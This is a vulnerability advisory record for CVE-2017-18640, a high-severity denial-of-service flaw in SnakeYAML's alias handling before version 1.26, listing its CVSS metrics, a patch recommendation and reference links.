CVE-2017-18640
HIGH severity · CVSS 7.5 · CWE-776
7.5CVSS HIGH
Summary
The Alias feature in SnakeYAML before 1.26 allows entity expansion during a load operation, a related issue to CVE-2003-1564.
Impact & exploitability
Attack vectorNetwork
Attack complexityLow
Privileges requiredNone
User interactionNone
Confidentiality impactNone
Integrity impactNone
Availability impactHigh
Exploit probability (EPSS)27%
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Recommendation
Apply the vendor fix promptly. Open any affected product above for its exact safe version.
Official patch: https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion ↗
Additional information
- NVD record
- https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billionPatch
- https://bitbucket.org/asomov/snakeyaml/wiki/Billion%20laughs%20attackAdvisory
- https://bitbucket.org/snakeyaml/snakeyaml/wiki/ChangesAdvisory
- https://lists.apache.org/thread.html/r1058e7646988394de6a3fd0857ea9b1ee0de14d7bb28fee5ff782457%40%3Ccommits.atlas.apache.org%3E
- https://lists.apache.org/thread.html/r154090b871cf96d985b90864442d84eb027c72c94bc3f0a5727ba2d1%40%3Ccommon-issues.hadoop.apache.org%3E
- https://lists.apache.org/thread.html/r16ae4e529401b75a1f5aa462b272b31bf2a108236f882f06fddc14bc%40%3Ccommon-issues.hadoop.apache.org%3E
- https://lists.apache.org/thread.html/r1703a402f30c8a2ee409f8c6f393e95a63f8c952cc9ee5bf9dd586dc%40%3Ccommits.cassandra.apache.org%3E
- https://bitbucket.org/snakeyaml/snakeyaml/issues/377Advisory